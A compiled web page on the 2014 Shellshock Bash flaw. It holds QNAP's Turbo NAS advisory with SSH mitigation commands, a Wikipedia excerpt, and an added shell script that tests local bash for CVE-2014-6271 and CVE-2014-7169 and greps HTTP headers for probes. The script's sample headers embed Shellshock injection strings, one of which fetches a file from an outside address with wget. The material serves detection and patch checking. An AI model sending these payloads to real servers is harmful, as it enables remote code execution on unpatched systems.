Security Advisory for Turbo NAS Users

September 26, 2014

Dear customers,
This week a serious security flaw was disclosed in Bash that affects many Unix- and Linux-based systems (CVE-2014-6271). QNAP® Systems, Inc. has been looking into the recent concerns over Bash code injection (CVE-2014-6271), which can lead to security vulnerabilities on the Turbo NAS and other Unix/Linux-based systems. The initial patch for CVE-2014-6271 was found to be incomplete, leaving a related vulnerability (CVE-2014-7169) unfixed. QNAP is actively working on a fix for this issue, and in the meantime encourages all Turbo NAS users to take the following immediate actions to avoid any possible exploitation of their systems.

As a temporary measure until a fix is released for this issue, please ensure that the following Turbo NAS services are not reachable from the Internet:
  • Web administration
  • Web server
  • WebDAV
  • Photo Station, Music Station, File Station, and any other NAS app that uses a web-based interface
Because the local network is normally not reachable from the Internet, users can still use their Turbo NAS on the LAN. Users who are still concerned about the security of their local network can follow the steps below to disable the QTS web UI completely and turn it on only when necessary:
  • Login to QTS and disable the Web Server in Applications
  • Login to QTS and disable the secure connection (SSL) in General Settings
  • Disable NAS web administration using an SSH utility (such as PuTTY):
    1. Connect to the Turbo NAS over SSH with the admin username and password
    2. Type the following command and press the “Enter” key:
      Bash:
      /etc/init.d/thttpd.sh stop
Note: The NAS web administration will become unavailable after taking the above steps. To restore it:
  1. Restart the Turbo NAS, or
  2. Manually start the web administration via SSH by typing the following command:
    Bash:
    /etc/init.d/thttpd.sh start
QNAP will keep users updated with the latest information as it addresses this issue. Users who would like further assistance can contact QNAP Technical Support via the Helpdesk.
Shellshock (software bug) - Wikipedia, the free encyclopedia
Shellshock, also known as Bashdoor[1] or the Bash bug,[2] is a security bug, disclosed 24 September 2014, in the widely used Unix Bash shell. The bug causes Bash to unintentionally execute commands embedded in environment variables.[1][3] While Bash is not itself an Internet-facing service, many Internet-facing daemons call it internally, so an attacker can use an Internet-facing service that sets the contents of an environment variable (a web server exporting HTTP request headers to a CGI script, for example) to have Bash execute the commands in that variable. DHCP clients are also potentially vulnerable, and more affected services are expected to be found.[4]

The bug was discovered on 12 September 2014 by Stéphane Chazelas,[1] who suggested the name "bashdoor".[1] The bug was assigned the CVE identifier CVE-2014-6271 and kept under embargo until 24 September 2014 14:00 UTC, in order to ensure that security updates were available for most systems[5] as soon as the details were made public. Within days a series of further related vulnerabilities in Bash were found: CVE-2014-7169, CVE-2014-7186 and CVE-2014-7187, leading to the need for further patches.
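The mechanism described above, as an added example that is not part of the QNAP advisory or the Wikipedia text: a POSIX sh script that (a) runs the canonical checks for CVE-2014-6271 and CVE-2014-7169 against a Bash binary and reports the result as an exit code, and (b) counts HTTP header lines carrying the "() {" exported-function prefix that a Shellshock probe against a web interface or CGI handler would send. The header lines are a constructed sample (addresses from the RFC 5737 documentation ranges), the function names are mine, and the script assumes `env`, `grep -E` and `mktemp -d` are available; only the two checks need a `bash` binary on the host.

```shell
#!/bin/sh
# Added example (not QNAP's or Wikipedia's code): probe a Bash binary for
# CVE-2014-6271 and CVE-2014-7169, and count HTTP header lines that carry the
# "() {" exported-function prefix a Shellshock probe against a CGI or web
# interface would send. Runs under POSIX sh; only the checks need a bash binary.

# CVE-2014-6271: a value shaped like an exported function with a trailing
# command. A vulnerable bash parses the definition and then runs the trailing
# "echo VULNERABLE" while importing the environment, before executing -c.
# Returns 0 = vulnerable, 1 = not vulnerable, 2 = bash binary not found.
shellshock_check() {
    bash_bin="${1:-bash}"
    command -v "$bash_bin" >/dev/null 2>&1 || return 2
    out=$(env x='() { :;}; echo VULNERABLE' "$bash_bin" -c 'echo test' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) return 0 ;;
        *)            return 1 ;;
    esac
}

# CVE-2014-7169: the incomplete first fix still let a crafted definition leave
# parser state behind, so "bash -c 'echo marker'" is parsed as a redirection
# and writes a file named "echo" in the working directory. Same return codes
# as above; the test runs in a scratch directory that is removed afterwards.
shellshock_check_7169() {
    bash_bin="${1:-bash}"
    command -v "$bash_bin" >/dev/null 2>&1 || return 2
    scratch=$(mktemp -d) || return 2
    ( cd "$scratch" && env X='() { (a)=>\' "$bash_bin" -c 'echo marker' >/dev/null 2>&1 )
    if [ -f "$scratch/echo" ]; then rc=0; else rc=1; fi
    rm -rf "$scratch"
    return "$rc"
}

# Constructed sample of request headers such as a web server or CGI handler
# would export into the environment (HTTP_USER_AGENT, HTTP_COOKIE, ...).
# Three of the five lines carry the Shellshock prefix; addresses are the
# documentation ranges from RFC 5737.
SAMPLE_HEADERS='User-Agent: () { :;}; /bin/bash -c "wget http://198.51.100.7/x -O /tmp/x"
Host: nas.example.net
Cookie: () { :; }; ping -c 1 203.0.113.5
Referer: http://www.example.com/index.html
X-Test: (){ :;}; echo probe'

# Read header lines on stdin and print how many start a function definition:
# "()" followed by optional whitespace and "{", the shape bash looked for at
# the start of a variable value before treating it as a function definition.
count_shellshock_probes() {
    grep -Ec '\(\)[[:space:]]*\{' || true
}

# Print the offending lines themselves (same pattern), for a blocking rule
# or an incident ticket.
list_shellshock_probes() {
    grep -E '\(\)[[:space:]]*\{' || true
}

# Stand-alone run: probe the local bash, then scan the constructed headers.
rc=0; shellshock_check bash || rc=$?
echo "CVE-2014-6271 check on local bash: rc=$rc (0=vulnerable 1=patched 2=no bash)"
rc=0; shellshock_check_7169 bash || rc=$?
echo "CVE-2014-7169 check on local bash: rc=$rc (0=vulnerable 1=patched 2=no bash)"
echo "Probe-bearing header lines: $(printf '%s\n' "$SAMPLE_HEADERS" | count_shellshock_probes)"
printf '%s\n' "$SAMPLE_HEADERS" | list_shellshock_probes
```

On a Turbo NAS the checks can be run over the same SSH session the advisory uses, pointing `shellshock_check` at the NAS's own bash binary; the header scanner is meant to be fed with whatever request or header log the exposed service keeps, since any field the server exports into a CGI environment is a delivery path for the payload.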
Polish » (first attacks)

» “The Chinese” are already exploiting the Bash hole for attacks -- Niebezpiecznik.pl --